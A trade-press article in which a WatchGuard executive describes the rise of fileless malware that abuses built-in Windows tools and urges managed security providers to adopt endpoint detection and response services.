Fileless malware attacks pose an increasing threat to organizations and MSSPs need to be doing more to stop them.

WatchGuard’s Corey Nachreiner

That’s according to WatchGuard Technologies‘ chief technology officer Corey Nachreiner. According to The 2018 State of Endpoint Security Risk by Ponemon Institute, 38 percent of attacks targeting companies in 2019 will be fileless.

Fileless malware attacks don’t involve attackers installing software on a victim’s machine. Instead, tools that are built into Windows are hijacked by adversaries and used to carry out attacks.

The past few months saw the emergence of the first “vaporworm” — a new breed of fileless malware with self-propagating, worm-like properties discovered by Trend Micro in late November.

What’s prompting the rise in fileless malware is actually the same thing that makes these attacks so dangerous, Nachreiner said. Fileless malware is a growing issue because it tends to evade legacy endpoint security controls, such as antivirus (AV) products that rely too heavily on traditional malware detection techniques, he said.

“Fileless malware is simply more capable of sneaking past the endpoint security controls most users have (at the expense of not being as persistent as traditional malware),” he said. “By leveraging legitimate scripting technologies administrators expect to see on Windows systems (such as Powershell), or by only running in memory —  often via legitimate processes that have been hijacked — it’s harder for legacy AV products to find fileless malware. Unless you are using defense technologies that proactively search for malicious and suspicious processes and behaviors, your security controls might miss fileless attacks.”

Fileless malware has grown significantly during the past three years, so MSSPs that aren’t deploying technology capable of finding and cleaning it will have some upset customers on their hands, Nachreiner said.

“The good news is that there are security solutions that fall into the general category of endpoint detection and response (EDR) that can detect fileless malware variants,” he said. “These products sometimes require a bit more management than the average AV solution, so MSSPs can grow their revenue by launching a managed detection and response (MDR) service offering for their customers.”

The degree to which MSSPs and other cybersecurity providers are prepared to safeguard against these threats varies greatly, Nachreiner said.

“That said, I would guess the majority are not,” he said. “The few that have launched MDR services are likely much more prepared than the others. Technology is not perfect, so the arms race between fileless malware and EDR (or other next-generation antivirus technologies) will continue. If you are already offering MDR for you customers, you’ve probably invested in one of the technologies most capable of detecting and preventing fileless malware attacks.”

In addition to EDR, there are other advanced anti-malware solutions that are designed specifically to scan memory and monitor processes to identify malware even if it never drops an actual file, Nachreiner said.